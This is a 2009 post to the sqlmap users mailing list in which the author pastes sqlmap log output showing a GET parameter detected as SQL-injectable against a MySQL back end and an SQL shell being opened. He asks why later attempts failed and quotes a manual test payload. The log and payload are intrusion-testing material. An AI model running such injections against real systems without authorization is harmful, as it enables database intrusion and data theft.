[sqlmap-users] Odd results
From: Konrads S. <ko...@sm...> - 2009-05-08 20:06:10
Hi,

sqlmap reported on an injection like this:

[22:21:30] [INFO] GET parameter 'start' is double quoted string injectable with 3 parenthesis
[22:21:30] [INFO] testing for parenthesis on injectable parameter
[22:21:38] [INFO] the injectable parameter requires 3 parenthesis
[22:21:38] [INFO] testing MySQL
[22:21:41] [INFO] confirming MySQL
[22:21:44] [INFO] retrieved:
[22:21:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL < 5.0.0
[22:21:53] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> show tables;
do you want to retrieve the SQL statement output? [Y/n]
[22:22:05] [INFO] fetching None query output: 'show%20tables%3B'
[22:22:05] [INFO] retrieved: �^C
[22:22:39] [ERROR] user aborted

However, repeat attempts invoking the same parameters failed. What could have happened? I can't really confirm the vuln manually either, I tried "))) AND 1=2 --

Konrads Smelkovs
Applied IT sorcery.